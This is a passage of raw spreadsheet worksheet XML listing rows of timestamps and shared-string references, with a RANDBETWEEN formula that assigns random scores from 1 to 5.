    <row r="9029" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A9029" s="1">
        <v>43372.51966435185</v>
      </c>
      <c r="C9029" t="s">
        <v>197</v>
      </c>
      <c r="E9029" s="2" t="s">
        <v>8041</v>
      </c>
      <c r="F9029">
        <f t="shared" ca="1" si="141"/>
        <v>3</v>
      </c>
    </row>
    <row r="9030" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9030" s="1">
        <v>43372.476331018515</v>
      </c>
      <c r="C9030" t="s">
        <v>318</v>
      </c>
      <c r="E9030" t="s">
        <v>8042</v>
      </c>
      <c r="F9030">
        <f t="shared" ca="1" si="141"/>
        <v>3</v>
      </c>
    </row>
    <row r="9031" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9031" s="1">
        <v>43372.427800925929</v>
      </c>
      <c r="C9031" t="s">
        <v>197</v>
      </c>
      <c r="F9031">
        <f t="shared" ca="1" si="141"/>
        <v>2</v>
      </c>
    </row>
    <row r="9032" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9032" s="1">
        <v>43372.427777777775</v>
      </c>
      <c r="C9032" t="s">
        <v>197</v>
      </c>
      <c r="F9032">
        <f t="shared" ca="1" si="141"/>
        <v>4</v>
      </c>
    </row>
    <row r="9033" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9033" s="1">
        <v>43372.360694444447</v>
      </c>
      <c r="C9033" t="s">
        <v>10</v>
      </c>
      <c r="D9033" t="s">
        <v>80</v>
      </c>
      <c r="E9033" t="s">
        <v>8043</v>
      </c>
      <c r="F9033">
        <f t="shared" ca="1" si="141"/>
        <v>4</v>
      </c>
    </row>
    <row r="9034" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9034" s="1">
        <v>43372.352430555555</v>
      </c>
      <c r="C9034" t="s">
        <v>253</v>
      </c>
      <c r="F9034">
        <f t="shared" ca="1" si="141"/>
        <v>3</v>
      </c>
    </row>
    <row r="9035" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9035" s="1">
        <v>43372.331365740742</v>
      </c>
      <c r="C9035" t="s">
        <v>41</v>
      </c>
      <c r="E9035" t="s">
        <v>8044</v>
      </c>
      <c r="F9035">
        <f t="shared" ca="1" si="141"/>
        <v>1</v>
      </c>
    </row>
    <row r="9036" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A9036" s="1">
        <v>43372.286921296298</v>
      </c>
      <c r="C9036" t="s">
        <v>48</v>
      </c>
      <c r="E9036" s="2" t="s">
        <v>8045</v>
      </c>
      <c r="F9036">
        <f t="shared" ca="1" si="141"/>
        <v>1</v>
      </c>
    </row>
    <row r="9037" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9037" s="1">
        <v>43372.253240740742</v>
      </c>
      <c r="C9037" t="s">
        <v>41</v>
      </c>
      <c r="E9037" t="s">
        <v>8046</v>
      </c>
      <c r="F9037">
        <f t="shared" ca="1" si="141"/>
        <v>1</v>
      </c>
    </row>
    <row r="9038" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9038" s="1">
        <v>43372.190335648149</v>
      </c>
      <c r="C9038" t="s">
        <v>4500</v>
      </c>
      <c r="E9038" t="s">
        <v>8047</v>
      </c>
      <c r="F9038">
        <f t="shared" ca="1" si="141"/>
        <v>3</v>
      </c>
    </row>
    <row r="9039" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A9039" s="1">
        <v>43372.159618055557</v>
      </c>
      <c r="C9039" t="s">
        <v>318</v>
      </c>
      <c r="E9039" s="2" t="s">
        <v>8048</v>
      </c>
      <c r="F9039">
        <f t="shared" ca="1" si="141"/>
        <v>3</v>
      </c>
    </row>
    <row r="9040" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9040" s="1">
        <v>43371.973958333336</v>
      </c>
      <c r="C9040" t="s">
        <v>43</v>
      </c>
      <c r="E9040" t="s">
        <v>8049</v>
      </c>
      <c r="F9040">
        <f t="shared" ca="1" si="141"/>
        <v>5</v>
      </c>
    </row>
    <row r="9041" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9041" s="1">
        <v>43371.972731481481</v>
      </c>
      <c r="C9041" t="s">
        <v>43</v>
      </c>
      <c r="E9041" t="s">
        <v>8050</v>
      </c>
      <c r="F9041">
        <f t="shared" ca="1" si="141"/>
        <v>5</v>
      </c>
    </row>
    <row r="9042" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9042" s="1">
        <v>43371.951597222222</v>
      </c>
      <c r="C9042" t="s">
        <v>124</v>
      </c>
      <c r="D9042" t="s">
        <v>713</v>
      </c>
      <c r="E9042" t="s">
        <v>8051</v>
      </c>
      <c r="F9042">
        <f t="shared" ca="1" si="141"/>
        <v>2</v>
      </c>
    </row>
    <row r="9043" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9043" s="1">
        <v>43371.867777777778</v>
      </c>
      <c r="C9043" t="s">
        <v>10</v>
      </c>
      <c r="D9043" t="s">
        <v>41</v>
      </c>
      <c r="E9043" t="s">
        <v>8052</v>
      </c>
      <c r="F9043">
        <f t="shared" ca="1" si="141"/>
        <v>2</v>
      </c>
    </row>
    <row r="9044" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9044" s="1">
        <v>43371.770567129628</v>
      </c>
      <c r="C9044" t="s">
        <v>10</v>
      </c>
      <c r="D9044" t="s">
        <v>52</v>
      </c>
      <c r="E9044" t="s">
        <v>8053</v>
      </c>
      <c r="F9044">
        <f t="shared" ca="1" si="141"/>
        <v>2</v>
      </c>
    </row>
    <row r="9045" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A9045" s="1">
        <v>43371.706921296296</v>
      </c>
      <c r="C9045" t="s">
        <v>6</v>
      </c>
      <c r="D9045" t="s">
        <v>821</v>
      </c>
      <c r="E9045" s="2" t="s">
        <v>8054</v>
      </c>
      <c r="F9045">
        <f t="shared" ca="1" si="141"/>
        <v>4</v>
      </c>
    </row>
    <row r="9046" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9046" s="1">
        <v>43371.673819444448</v>
      </c>
      <c r="C9046" t="s">
        <v>10</v>
      </c>
      <c r="D9046" t="s">
        <v>6</v>
      </c>
      <c r="E9046" t="s">
        <v>8055</v>
      </c>
      <c r="F9046">
        <f t="shared" ca="1" si="141"/>
        <v>4</v>
      </c>
    </row>
    <row r="9047" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A9047" s="1">
        <v>43371.6718287037</v>
      </c>
      <c r="C9047" t="s">
        <v>10</v>
      </c>
      <c r="D9047" t="s">
        <v>52</v>
      </c>
      <c r="E9047" s="2" t="s">
        <v>8056</v>
      </c>
      <c r="F9047">
        <f t="shared" ca="1" si="141"/>
        <v>4</v>
      </c>
    </row>
    <row r="9048" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A9048" s="1">
        <v>43371.634699074071</v>
      </c>
      <c r="C9048" t="s">
        <v>10</v>
      </c>
      <c r="D9048" t="s">
        <v>112</v>
      </c>
      <c r="E9048" s="2" t="s">
        <v>8057</v>
      </c>
      <c r="F9048">
        <f t="shared" ca="1" si="141"/>
        <v>3</v>
      </c>
    </row>
    <row r="9049" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9049" s="1">
        <v>43371.627233796295</v>
      </c>
      <c r="C9049" t="s">
        <v>10</v>
      </c>
      <c r="D9049" t="s">
        <v>46</v>
      </c>
      <c r="E9049" t="s">
        <v>8058</v>
      </c>
      <c r="F9049">
        <f t="shared" ca="1" si="141"/>
        <v>5</v>
      </c>
    </row>
    <row r="9050" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A9050" s="1">
        <v>43371.583796296298</v>
      </c>
      <c r="C9050" t="s">
        <v>10</v>
      </c>
      <c r="D9050" t="s">
        <v>6</v>
      </c>
      <c r="E9050" s="2" t="s">
        <v>8059</v>
      </c>
      <c r="F9050">
        <f t="shared" ca="1" si="141"/>
        <v>2</v>
      </c>
    </row>
    <row r="9051" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A9051" s="1">
        <v>43371.555289351854</v>
      </c>
      <c r="C9051" t="s">
        <v>10</v>
      </c>
      <c r="D9051" t="s">
        <v>163</v>
      </c>
      <c r="E9051" s="2" t="s">
        <v>8060</v>
      </c>
      <c r="F9051">
        <f t="shared" ca="1" si="141"/>
        <v>2</v>
      </c>
    </row>
    <row r="9052" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9052" s="1">
        <v>43371.541712962964</v>
      </c>
      <c r="C9052" t="s">
        <v>10</v>
      </c>
      <c r="D9052" t="s">
        <v>89</v>
      </c>
      <c r="E9052" t="s">
        <v>8061</v>
      </c>
      <c r="F9052">
        <f t="shared" ca="1" si="141"/>
        <v>2</v>
      </c>
    </row>
    <row r="9053" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9053" s="1">
        <v>43371.529224537036</v>
      </c>
      <c r="C9053" t="s">
        <v>10</v>
      </c>
      <c r="D9053" t="s">
        <v>23</v>
      </c>
      <c r="E9053" t="s">
        <v>8062</v>
      </c>
      <c r="F9053">
        <f t="shared" ca="1" si="141"/>
        <v>2</v>
      </c>
    </row>
    <row r="9054" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9054" s="1">
        <v>43371.520914351851</v>
      </c>
      <c r="C9054" t="s">
        <v>10</v>
      </c>
      <c r="D9054" t="s">
        <v>23</v>
      </c>
      <c r="E9054" t="s">
        <v>8063</v>
      </c>
      <c r="F9054">
        <f t="shared" ca="1" si="141"/>
        <v>5</v>
      </c>
    </row>
    <row r="9055" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A9055" s="1">
        <v>43371.449270833335</v>
      </c>
      <c r="C9055" t="s">
        <v>6</v>
      </c>
      <c r="D9055" t="s">
        <v>194</v>
      </c>
      <c r="E9055" s="2" t="s">
        <v>8064</v>
      </c>
      <c r="F9055">
        <f t="shared" ca="1" si="141"/>
        <v>4</v>
      </c>
    </row>
    <row r="9056" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9056" s="1">
        <v>43371.446666666663</v>
      </c>
      <c r="C9056" t="s">
        <v>10</v>
      </c>
      <c r="E9056" t="s">
        <v>8065</v>
      </c>
      <c r="F9056">
        <f t="shared" ca="1" si="141"/>
        <v>5</v>
      </c>
    </row>
    <row r="9057" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9057" s="1">
        <v>43371.4378125</v>
      </c>
      <c r="C9057" t="s">
        <v>10</v>
      </c>
      <c r="D9057" t="s">
        <v>336</v>
      </c>
      <c r="E9057" t="s">
        <v>8066</v>
      </c>
      <c r="F9057">
        <f t="shared" ca="1" si="141"/>
        <v>4</v>
      </c>
    </row>
    <row r="9058" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9058" s="1">
        <v>43371.377222222225</v>
      </c>
      <c r="C9058" t="s">
        <v>16</v>
      </c>
      <c r="E9058" t="s">
        <v>8067</v>
      </c>
      <c r="F9058">
        <f t="shared" ca="1" si="141"/>
        <v>4</v>
      </c>
    </row>
    <row r="9059" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9059" s="1">
        <v>43371.372673611113</v>
      </c>
      <c r="C9059" t="s">
        <v>10</v>
      </c>
      <c r="D9059" t="s">
        <v>52</v>
      </c>
      <c r="E9059" t="s">
        <v>8068</v>
      </c>
      <c r="F9059">
        <f t="shared" ca="1" si="141"/>
        <v>1</v>
      </c>
    </row>
    <row r="9060" spans="1:6" ht="225" x14ac:dyDescent="0.25">
      <c r="A9060" s="1">
        <v>43371.370648148149</v>
      </c>
      <c r="C9060" t="s">
        <v>71</v>
      </c>
      <c r="D9060" t="s">
        <v>312</v>
      </c>
      <c r="E9060" s="2" t="s">
        <v>8069</v>
      </c>
      <c r="F9060">
        <f t="shared" ca="1" si="141"/>
        <v>1</v>
      </c>
    </row>
    <row r="9061" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9061" s="1">
        <v>43371.368275462963</v>
      </c>
      <c r="C9061" t="s">
        <v>41</v>
      </c>
      <c r="E9061" t="s">
        <v>8070</v>
      </c>
      <c r="F9061">
        <f t="shared" ca="1" si="141"/>
        <v>4</v>
      </c>
    </row>
    <row r="9062" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A9062" s="1">
        <v>43371.36513888889</v>
      </c>
      <c r="C9062" t="s">
        <v>10</v>
      </c>
      <c r="D9062" t="s">
        <v>17</v>
      </c>
      <c r="E9062" s="2" t="s">
        <v>8071</v>
      </c>
      <c r="F9062">
        <f t="shared" ca="1" si="141"/>
        <v>2</v>
      </c>
    </row>
    <row r="9063" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9063" s="1">
        <v>43371.35974537037</v>
      </c>
      <c r="C9063" t="s">
        <v>97</v>
      </c>
      <c r="E9063" t="s">
        <v>8072</v>
      </c>
      <c r="F9063">
        <f t="shared" ca="1" si="141"/>
        <v>2</v>
      </c>
    </row>
    <row r="9064" spans="1:6" ht="255" x14ac:dyDescent="0.25">
      <c r="A9064" s="1">
        <v>43371.337847222225</v>
      </c>
      <c r="C9064" t="s">
        <v>65</v>
      </c>
      <c r="D9064" t="s">
        <v>312</v>
      </c>
      <c r="E9064" s="2" t="s">
        <v>8073</v>
      </c>
      <c r="F9064">
        <f t="shared" ca="1" si="141"/>
        <v>5</v>
      </c>
    </row>
    <row r="9065" spans="1:6" ht="345" x14ac:dyDescent="0.25">
      <c r="A9065" s="1">
        <v>43371.311053240737</v>
      </c>
      <c r="C9065" t="s">
        <v>10</v>
      </c>
      <c r="D9065" t="s">
        <v>36</v>
      </c>
      <c r="E9065" s="2" t="s">
        <v>8074</v>
      </c>
      <c r="F9065">
        <f t="shared" ca="1" si="141"/>
        <v>4</v>
      </c>
    </row>
    <row r="9066" spans="1:6" ht="345" x14ac:dyDescent="0.25">
      <c r="A9066" s="1">
        <v>43371.310902777775</v>
      </c>
      <c r="C9066" t="s">
        <v>10</v>
      </c>
      <c r="D9066" t="s">
        <v>36</v>
      </c>
      <c r="E9066" s="2" t="s">
        <v>8074</v>
      </c>
      <c r="F9066">
        <f t="shared" ca="1" si="141"/>
        <v>4</v>
      </c>
    </row>
    <row r="9067" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9067" s="1">
        <v>43371.307337962964</v>
      </c>
      <c r="C9067" t="s">
        <v>41</v>
      </c>
      <c r="E9067" t="s">
        <v>8075</v>
      </c>
      <c r="F9067">
        <f t="shared" ca="1" si="141"/>
        <v>5</v>
      </c>
    </row>
    <row r="9068" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A9068" s="1">
        <v>43371.301782407405</v>
      </c>
      <c r="C9068" t="s">
        <v>41</v>
      </c>
      <c r="E9068" s="2" t="s">
        <v>8076</v>
      </c>
      <c r="F9068">
        <f t="shared" ca="1" si="141"/>
        <v>1</v>
      </c>
    </row>
    <row r="9069" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A9069" s="1">
        <v>43371.293773148151</v>
      </c>
      <c r="C9069" t="s">
        <v>48</v>
      </c>
      <c r="E9069" s="2" t="s">
        <v>8077</v>
      </c>
      <c r="F9069">
        <f t="shared" ca="1" si="141"/>
        <v>3</v>
      </c>
    </row>
    <row r="9070" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9070" s="1">
        <v>43371.293414351851</v>
      </c>
      <c r="C9070" t="s">
        <v>2192</v>
      </c>
      <c r="D9070" t="s">
        <v>1036</v>
      </c>
      <c r="E9070" t="s">
        <v>8078</v>
      </c>
      <c r="F9070">
        <f t="shared" ca="1" si="141"/>
        <v>5</v>
      </c>
    </row>
    <row r="9071" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9071" s="1">
        <v>43371.254837962966</v>
      </c>
      <c r="C9071" t="s">
        <v>471</v>
      </c>
      <c r="E9071" t="s">
        <v>8079</v>
      </c>
      <c r="F9071">
        <f t="shared" ca="1" si="141"/>
        <v>2</v>
      </c>
    </row>
    <row r="9072" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9072" s="1">
        <v>43371.252372685187</v>
      </c>
      <c r="C9072" t="s">
        <v>97</v>
      </c>
      <c r="E9072" t="s">
        <v>8080</v>
      </c>
      <c r="F9072">
        <f t="shared" ca="1" si="141"/>
        <v>1</v>
      </c>
    </row>
    <row r="9073" spans="1:6" ht="225" x14ac:dyDescent="0.25">
      <c r="A9073" s="1">
        <v>43371.2340625</v>
      </c>
      <c r="C9073" t="s">
        <v>41</v>
      </c>
      <c r="E9073" s="2" t="s">
        <v>8081</v>
      </c>
      <c r="F9073">
        <f t="shared" ca="1" si="141"/>
        <v>1</v>
      </c>
    </row>
    <row r="9074" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A9074" s="1">
        <v>43371.215324074074</v>
      </c>
      <c r="C9074" t="s">
        <v>71</v>
      </c>
      <c r="E9074" s="2" t="s">
        <v>8082</v>
      </c>
      <c r="F9074">
        <f t="shared" ca="1" si="141"/>
        <v>4</v>
      </c>
    </row>
    <row r="9075" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9075" s="1">
        <v>43371.207326388889</v>
      </c>
      <c r="C9075" t="s">
        <v>48</v>
      </c>
      <c r="D9075" t="s">
        <v>312</v>
      </c>
      <c r="E9075" t="s">
        <v>8083</v>
      </c>
      <c r="F9075">
        <f t="shared" ca="1" si="141"/>
        <v>2</v>
      </c>
    </row>
    <row r="9076" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A9076" s="1">
        <v>43371.207303240742</v>
      </c>
      <c r="C9076" t="s">
        <v>50</v>
      </c>
      <c r="E9076" s="2" t="s">
        <v>8084</v>
      </c>
      <c r="F9076">
        <f t="shared" ca="1" si="141"/>
        <v>1</v>
      </c>
    </row>
    <row r="9077" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9077" s="1">
        <v>43371.197743055556</v>
      </c>
      <c r="C9077" t="s">
        <v>41</v>
      </c>
      <c r="E9077" t="s">
        <v>8085</v>
      </c>
      <c r="F9077">
        <f t="shared" ca="1" si="141"/>
        <v>2</v>
      </c>
    </row>
    <row r="9078" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A9078" s="1">
        <v>43371.191388888888</v>
      </c>
      <c r="C9078" t="s">
        <v>41</v>
      </c>
      <c r="E9078" s="2" t="s">
        <v>8086</v>
      </c>
      <c r="F9078">
        <f t="shared" ca="1" si="141"/>
        <v>1</v>
      </c>
    </row>
    <row r="9079" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9079" s="1">
        <v>43371.191238425927</v>
      </c>
      <c r="C9079" t="s">
        <v>71</v>
      </c>
      <c r="E9079" t="s">
        <v>8087</v>
      </c>
      <c r="F9079">
        <f t="shared" ca="1" si="141"/>
        <v>2</v>
      </c>
    </row>
    <row r="9080" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A9080" s="1">
        <v>43371.162546296298</v>
      </c>
      <c r="C9080" t="s">
        <v>542</v>
      </c>
      <c r="E9080" s="2" t="s">
        <v>8088</v>
      </c>
      <c r="F9080">
        <f t="shared" ca="1" si="141"/>
        <v>4</v>
      </c>
    </row>
    <row r="9081" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9081" s="1">
        <v>43371.129872685182</v>
      </c>
      <c r="C9081" t="s">
        <v>314</v>
      </c>
      <c r="E9081" t="s">
        <v>8089</v>
      </c>
      <c r="F9081">
        <f t="shared" ca="1" si="141"/>
        <v>1</v>
      </c>
    </row>
    <row r="9082" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9082" s="1">
        <v>43371.128877314812</v>
      </c>
      <c r="C9082" t="s">
        <v>48</v>
      </c>
      <c r="E9082" t="s">
        <v>8090</v>
      </c>
      <c r="F9082">
        <f t="shared" ca="1" si="141"/>
        <v>2</v>
      </c>
    </row>
    <row r="9083" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9083" s="1">
        <v>43371.128564814811</v>
      </c>
      <c r="C9083" t="s">
        <v>139</v>
      </c>
      <c r="E9083" t="s">
        <v>8091</v>
      </c>
      <c r="F9083">
        <f t="shared" ca="1" si="141"/>
        <v>3</v>
      </c>
    </row>
    <row r="9084" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9084" s="1">
        <v>43371.126388888886</v>
      </c>
      <c r="C9084" t="s">
        <v>71</v>
      </c>
      <c r="D9084" t="s">
        <v>17</v>
      </c>
      <c r="E9084" t="s">
        <v>8092</v>
      </c>
      <c r="F9084">
        <f t="shared" ca="1" si="141"/>
        <v>5</v>
      </c>
    </row>
    <row r="9085" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9085" s="1">
        <v>43371.083553240744</v>
      </c>
      <c r="C9085" t="s">
        <v>41</v>
      </c>
      <c r="E9085" t="s">
        <v>8093</v>
      </c>
      <c r="F9085">
        <f t="shared" ca="1" si="141"/>
        <v>1</v>
      </c>
    </row>
    <row r="9086" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A9086" s="1">
        <v>43371.076736111114</v>
      </c>
      <c r="C9086" t="s">
        <v>1080</v>
      </c>
      <c r="E9086" s="2" t="s">
        <v>8094</v>
      </c>
      <c r="F9086">
        <f t="shared" ca="1" si="141"/>
        <v>1</v>
      </c>
    </row>
    <row r="9087" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A9087" s="1">
        <v>43371.067106481481</v>
      </c>
      <c r="C9087" t="s">
        <v>41</v>
      </c>
      <c r="E9087" s="2" t="s">
        <v>8095</v>
      </c>
      <c r="F9087">
        <f t="shared" ca="1" si="141"/>
        <v>1</v>
      </c>
    </row>
    <row r="9088" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9088" s="1">
        <v>43371.027187500003</v>
      </c>
      <c r="C9088" t="s">
        <v>6663</v>
      </c>
      <c r="E9088">
        <v>243812612413</v>
      </c>
      <c r="F9088">
        <f t="shared" ca="1" si="141"/>
        <v>2</v>
      </c>
    </row>
    <row r="9089" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9089" s="1">
        <v>43370.936712962961</v>
      </c>
      <c r="C9089" t="s">
        <v>41</v>
      </c>
      <c r="E9089" t="s">
        <v>8096</v>
      </c>
      <c r="F9089">
        <f t="shared" ca="1" si="141"/>
        <v>1</v>
      </c>
    </row>
    <row r="9090" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A9090" s="1">
        <v>43370.8591087963</v>
      </c>
      <c r="C9090" t="s">
        <v>60</v>
      </c>
      <c r="E9090" s="2" t="s">
        <v>8097</v>
      </c>
      <c r="F9090">
        <f t="shared" ref="F9090:F9153" ca="1" si="142">RANDBETWEEN(1,5)</f>
        <v>5</v>
      </c>
    </row>
    <row r="9091" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9091" s="1">
        <v>43370.804085648146</v>
      </c>
      <c r="C9091" t="s">
        <v>10</v>
      </c>
      <c r="D9091" t="s">
        <v>6</v>
      </c>
      <c r="E9091" t="s">
        <v>8098</v>
      </c>
      <c r="F9091">
        <f t="shared" ca="1" si="142"/>
        <v>5</v>
      </c>
    </row>
    <row r="9092" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9092" s="1">
        <v>43370.754884259259</v>
      </c>
      <c r="C9092" t="s">
        <v>260</v>
      </c>
      <c r="E9092" t="s">
        <v>8099</v>
      </c>
      <c r="F9092">
        <f t="shared" ca="1" si="142"/>
        <v>5</v>
      </c>
    </row>
    <row r="9093" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9093" s="1">
        <v>43370.750381944446</v>
      </c>
      <c r="C9093" t="s">
        <v>10</v>
      </c>
      <c r="D9093" t="s">
        <v>6</v>
      </c>
      <c r="E9093" t="s">
        <v>8100</v>
      </c>
      <c r="F9093">
        <f t="shared" ca="1" si="142"/>
        <v>5</v>
      </c>
    </row>
    <row r="9094" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A9094" s="1">
        <v>43370.73537037037</v>
      </c>
      <c r="C9094" t="s">
        <v>6</v>
      </c>
      <c r="D9094" t="s">
        <v>114</v>
      </c>
      <c r="E9094" s="2" t="s">
        <v>8101</v>
      </c>
      <c r="F9094">
        <f t="shared" ca="1" si="142"/>
        <v>5</v>
      </c>
    </row>
    <row r="9095" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A9095" s="1">
        <v>43370.727523148147</v>
      </c>
      <c r="C9095" t="s">
        <v>260</v>
      </c>
      <c r="E9095" s="2" t="s">
        <v>8102</v>
      </c>
      <c r="F9095">
        <f t="shared" ca="1" si="142"/>
        <v>4</v>
      </c>
    </row>
    <row r="9096" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9096" s="1">
        <v>43370.717650462961</v>
      </c>
      <c r="C9096" t="s">
        <v>10</v>
      </c>
      <c r="D9096" t="s">
        <v>89</v>
      </c>
      <c r="E9096" t="s">
        <v>8103</v>
      </c>
      <c r="F9096">
        <f t="shared" ca="1" si="142"/>
        <v>4</v>
      </c>
    </row>
    <row r="9097" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9097" s="1">
        <v>43370.703402777777</v>
      </c>
      <c r="C9097" t="s">
        <v>10</v>
      </c>
      <c r="D9097" t="s">
        <v>251</v>
      </c>
      <c r="E9097" t="s">
        <v>8104</v>
      </c>
      <c r="F9097">
        <f t="shared" ca="1" si="142"/>
        <v>5</v>
      </c>
    </row>
    <row r="9098" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9098" s="1">
        <v>43370.698564814818</v>
      </c>
      <c r="C9098" t="s">
        <v>10</v>
      </c>
      <c r="D9098" t="s">
        <v>367</v>
      </c>
      <c r="E9098" t="s">
        <v>8105</v>
      </c>
      <c r="F9098">
        <f t="shared" ca="1" si="142"/>
        <v>4</v>
      </c>
    </row>
    <row r="9099" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9099" s="1">
        <v>43370.690138888887</v>
      </c>
      <c r="C9099" t="s">
        <v>60</v>
      </c>
      <c r="E9099" t="s">
        <v>8106</v>
      </c>
      <c r="F9099">
        <f t="shared" ca="1" si="142"/>
        <v>4</v>
      </c>
    </row>
    <row r="9100" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9100" s="1">
        <v>43370.67732638889</v>
      </c>
      <c r="C9100" t="s">
        <v>260</v>
      </c>
      <c r="F9100">
        <f t="shared" ca="1" si="142"/>
        <v>1</v>
      </c>
    </row>
    <row r="9101" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A9101" s="1">
        <v>43370.664293981485</v>
      </c>
      <c r="C9101" t="s">
        <v>6</v>
      </c>
      <c r="D9101" t="s">
        <v>25</v>
      </c>
      <c r="E9101" s="2" t="s">
        <v>8107</v>
      </c>
      <c r="F9101">
        <f t="shared" ca="1" si="142"/>
        <v>1</v>
      </c>
    </row>
    <row r="9102" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9102" s="1">
        <v>43370.617314814815</v>
      </c>
      <c r="C9102" t="s">
        <v>10</v>
      </c>
      <c r="D9102" t="s">
        <v>23</v>
      </c>
      <c r="E9102" t="s">
        <v>8108</v>
      </c>
      <c r="F9102">
        <f t="shared" ca="1" si="142"/>
        <v>3</v>
      </c>
    </row>
    <row r="9103" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9103" s="1">
        <v>43370.587766203702</v>
      </c>
      <c r="C9103" t="s">
        <v>10</v>
      </c>
      <c r="D9103" t="s">
        <v>151</v>
      </c>
      <c r="E9103" t="s">
        <v>8109</v>
      </c>
      <c r="F9103">
        <f t="shared" ca="1" si="142"/>
        <v>2</v>
      </c>
    </row>
    <row r="9104" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9104" s="1">
        <v>43370.573287037034</v>
      </c>
      <c r="C9104" t="s">
        <v>10</v>
      </c>
      <c r="D9104" t="s">
        <v>80</v>
      </c>
      <c r="E9104" t="s">
        <v>8110</v>
      </c>
      <c r="F9104">
        <f t="shared" ca="1" si="142"/>
        <v>3</v>
      </c>
    </row>
    <row r="9105" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9105" s="1">
        <v>43370.57304398148</v>
      </c>
      <c r="C9105" t="s">
        <v>6</v>
      </c>
      <c r="D9105" t="s">
        <v>821</v>
      </c>
      <c r="E9105" t="s">
        <v>8111</v>
      </c>
      <c r="F9105">
        <f t="shared" ca="1" si="142"/>
        <v>5</v>
      </c>
    </row>
    <row r="9106" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A9106" s="1">
        <v>43370.543576388889</v>
      </c>
      <c r="C9106" t="s">
        <v>10</v>
      </c>
      <c r="D9106" t="s">
        <v>6</v>
      </c>
      <c r="E9106" s="2" t="s">
        <v>8112</v>
      </c>
      <c r="F9106">
        <f t="shared" ca="1" si="142"/>
        <v>4</v>
      </c>
    </row>
    <row r="9107" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A9107" s="1">
        <v>43370.530324074076</v>
      </c>
      <c r="C9107" t="s">
        <v>71</v>
      </c>
      <c r="E9107" s="2" t="s">
        <v>8113</v>
      </c>
      <c r="F9107">
        <f t="shared" ca="1" si="142"/>
        <v>5</v>
      </c>
    </row>
    <row r="9108" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A9108" s="1">
        <v>43370.528298611112</v>
      </c>
      <c r="C9108" t="s">
        <v>6</v>
      </c>
      <c r="D9108" t="s">
        <v>25</v>
      </c>
      <c r="E9108" s="2" t="s">
        <v>8114</v>
      </c>
      <c r="F9108">
        <f t="shared" ca="1" si="142"/>
        <v>3</v>
      </c>
    </row>
    <row r="9109" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A9109" s="1">
        <v>43370.524837962963</v>
      </c>
